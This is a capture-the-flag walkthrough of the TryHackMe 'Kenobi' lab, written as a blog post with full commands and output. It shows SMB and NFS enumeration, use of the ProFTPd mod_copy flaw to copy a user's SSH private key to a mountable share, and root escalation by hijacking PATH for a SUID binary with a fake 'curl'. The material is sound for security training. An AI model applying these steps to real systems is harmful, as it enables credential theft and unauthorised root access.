Posts Kenobi on Tryhackme
Post
Cancel

Kenobi on Tryhackme

THM Kenobi Link

Kenobi WriteUp

by Zebra

RoomDateDifficultyTypeTimeOwn IntentionMachine
Kenobi29.10.2020EasyWalkthrought1hEasyLinux

Tasks

TaskQuestion
Task 1.1Make sure you’re connected to our network and deploy the machine
Task 1.2Scan the machine with nmap, how many ports are open?
Task 2.1Using nmap we can enumerate a machine for SMB shares.
Task 2.2Once you’re connected, list the files on the share. What is the file can you see?
Task 2.3What port is FTP running on?
Task 2.4What mount can we see?
Task 3.1ProFTP. What is the version?
Task 3.2How many exploits are there for the ProFTPd running?
Task 3.3Autocomplete
Task 3.4We know that the FTP service is running as the Kenobi user and an ssh key is generated for that user.
Task 3.5What is Kenobi’s user flag (/home/kenobi/user.txt)?
Task 4.1What file looks particularly out of the ordinary?
Task 4.2Run the binary, how many options appear?
Task 4.3Autocomplete
Task 4.4What is the root flag (/root/root.txt)?

Introduction

Hello and welcome to the Write-Up of the Room “Kenobi” on tryhackme.
First i make some directories for better structure.
Then I check the Task, which I had to solve.
We see, that with have a little red line to get the user and root flag,
cause this Room is “guided”. That means that we get a lot of hints and commands in the tasks itself.

So let’s begin:

Preparation Steps

1
2
3
4
mkdir Kenobi #New Room folder
cd Kenobi   	#Move into folder
mkdir nmap  	#Nmap directory
mkdir gobuster  #Gobuster directory

Scanning and Enumeration

Lets begin with a simple nmap only Portscan and sort with a grep command

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/thm/kenobi]-[IP:][]-[Target:][10.10.248.210]
└─$ nmap -Pn 10.10.248.210 -oN ./nmap/ports                  
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:10 CET
Nmap scan report for 10.10.248.210
Host is up (0.085s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds
                                                                                                                            
cat ./nmap/ports|grep open | awk -F/ '{print $1}' ORS=','
21,22,80,111,139,445,2049,

Now we can use this little Portscan to scan the Ports fully.

nmap -A -T4 -p 21,22,80,111,139,445,2049 10.10.248.210

Our output shows us the following results:

PortServiceInformation’s
21/tcpftpProFTPD 1.3.5
22/tcpsshOPEN SSH 7.2p2 Ubuntu
80/tcpwebserverApache 2.4.18 Webserver Ubuntu
111/tcprcpbindrcpbind service
139/tcpsambawrgr:WORKGROUP
445/tcpsamba4.3.11 - Ubuntu wrgr:WORKGROUP
2049/tcpnfs_acl—-

### Task 1.1 + 1.2 solved ###

Samba Enumeration

I cut some information’s out of the nmap output!

SMB Scanning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.248.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:21 CET
Nmap scan report for 10.10.248.210
Host is up (0.082s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.248.210\IPC$: 
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.248.210\anonymous: 
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.248.210\print$: 
|     Anonymous access: <none>
|_    Current user access: <none>

Inspect SMB shares

1
2
3
4
5
6
7
smbclient //10.10.248.210/anonymous
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 12:49:09 2019
  ..                                  D        0  Wed Sep  4 12:56:07 2019
  log.txt                             N    12237  Wed Sep  4 12:49:09 2019

One textfile found -> download this

Download the file

1
2
3
4
5
6
7
8
9
10
11
12
13
smbget -R smb://10.10.248.210/anonymous
Password for [kali] connecting to //anonymous/10.10.248.210: 
Using workgroup WORKGROUP, user kali
smb://10.10.248.210/anonymous/log.txt 
Downloaded 11,95kB in 5 seconds
  
┌──(kali㉿kali)-[~/thm/kenobi]-[IP:][]-[Target:][10.10.248.210]
└─$ la
insgesamt 12K
drwxr-xr-x 1 kali kali 248 30. Okt 09:28 downloads/
drwxr-xr-x 1 kali kali   0 29. Okt 20:23 gobuster/
-rwxr-xr-x 1 kali kali 12K 30. Okt 09:29 log.txt*
drwxr-xr-x 1 kali kali 264 30. Okt 09:05 nmap/

In the log.txt you will get a lot of information’s about the ftp service.

### Task 2.1 - 2.3 solved ###

RCP enumeration

For Task 2.4 we do a little jump to the RPC.

What means RPC:
“This is just an server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.”
https://linux.die.net/man/8/rpcbind

With nmap we can enumerate this service:

1
2
3
4
5
6
7
8
9
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.248.210
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:37 CET
Nmap scan report for 10.10.248.210
Host is up (0.080s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /*** *

### Task 2.4 solved ###

Exploitation

ProFTP enumeration and exploitation

ProFTPd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

For the Task 1 use the nmap protocol you saved earlier.

Find some exploits for this

1
2
3
4
5
6
7
8
searchsploit proftp 1.3.5              
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution    | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote CE            | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                       | linux/remote/36742.txt
------------------------------------------------ ---------------------------------

When you find some interesting things you can take look at the file with:

searchsploit -x linux/remote/36742.txt

Or save the files to your location with:

searchsploit -m linux/remote/37262.rb

More infos about the exploit https://www.cvedetails.com/cve/CVE-2015-3306/

For this task we have to use SITE CPFR and SITE CPTO commands. I never heard about this. so here are my steps:

  1. Use nc 10.10.248.210 21
  2. Checkout the help pate site help
  3. Get informations out of google.http://www.proftpd.org/docs/contrib/mod_copy.html#SITE_CPFR
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nc 10.10.248.210 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.248.210]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
 CPFR <sp> pathname
 CPTO <sp> pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@kenobi
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Lets mount the nfs and copy the id_rsa

Why and what could we mount? We find out in the step before that on port 111/tcp nfs is running and scan this with nmap-scrips. That shows us the mountable drives.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mkdir /mnt/kenobiNFS

mount 10.10.248.210:/var /mnt/kenobiNFS
mount.nfs: failed to apply fstab options

-----> Not reachable cause to has to use "sudo"

sudo mount 10.10.248.210:/var /mnt/kenobiNFS
                                                                                
la /mnt/kenobiNFS 
insgesamt 48K
drwxr-xr-x  2 root root    4,0K  4. Sep 2019  backups/
drwxr-xr-x  9 root root    4,0K  4. Sep 2019  cache/
drwxrwxrwt  2 root root    4,0K  4. Sep 2019  crash/
drwxr-xr-x 40 root root    4,0K  4. Sep 2019  lib/
drwxrwsr-x  2 root staff   4,0K 12. Apr 2016  local/
lrwxrwxrwx  1 root root       9  4. Sep 2019  lock -> /run/lock/
drwxrwxr-x 10 root crontab 4,0K  4. Sep 2019  log/
drwxrwsr-x  2 root mail    4,0K 27. Feb 2019  mail/
drwxr-xr-x  2 root root    4,0K 27. Feb 2019  opt/
lrwxrwxrwx  1 root root       4  4. Sep 2019  run -> /run/
drwxr-xr-x  2 root root    4,0K 30. Jan 2019  snap/
drwxr-xr-x  5 root root    4,0K  4. Sep 2019  spool/
drwxrwxrwt  6 root root    4,0K 30. Okt 10:00 tmp/
drwxr-xr-x  3 root root    4,0K  4. Sep 2019  www/

SSH connection with the priv_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
cp /mnt/kenobiNFS/tmp/id_rsa .           

la               
insgesamt 16K
drwxr-xr-x 1 kali kali  248 30. Okt 09:28 downloads/
drwxr-xr-x 1 kali kali    0 29. Okt 20:23 gobuster/
-rw-r--r-- 1 kali kali 1,7K 30. Okt 10:10 id_rsa
-rwxr-xr-x 1 kali kali  12K 30. Okt 09:29 log.txt*
drwxr-xr-x 1 kali kali  264 30. Okt 09:05 nmap/

sudo chmod 600 id_rsa                       

ssh -i id_rsa kenobi@10.10.248.210
load pubkey "id_rsa": invalid format
The authenticity of host '10.10.248.210 (10.10.248.210)'


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ cat /home/kenobi/user.txt

### Task 3.1 - 3.5 solved ###

Privilege escalation

SUID Escalation

The Task 4 give us a hint we had to look for SUIDs.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$ 

One of this listed ones is interesting and not normal one.

Exploitations and path change

check out the /usr/bin/menu

1
2
3
4
5
6
7
8
9
10
11
strings /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig

With that information we know the commands, which get used by this binary

Thing to do:

  1. Manipulate the “curl” command with something useful, that runs by root
  2. change $PATH
  3. excecute /usr/bin/menu with option “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo /bin/sh > curl
kenobi@kenobi:/tmp$ chmod 777 curl 
kenobi@kenobi:/tmp$ echo $PATH
/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# cat /root/root.txt

When you do PATH changes PLEASE REMEMBER THE OLD one for change it back.

### Task 4.1 - 4.4 solved ###

<h2>What we learned:</h2>

  1. Nmap simple port scan with get a port list with grep,awk etc…
  2. Samba enumeration nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
  3. Samba download smbget -R smb://10.10.248.210/anonymous
  4. SITE CPFR and SITE CPTO commands
  5. SUID Priv Escalation

This post is licensed under CC BY 4.0 by the author.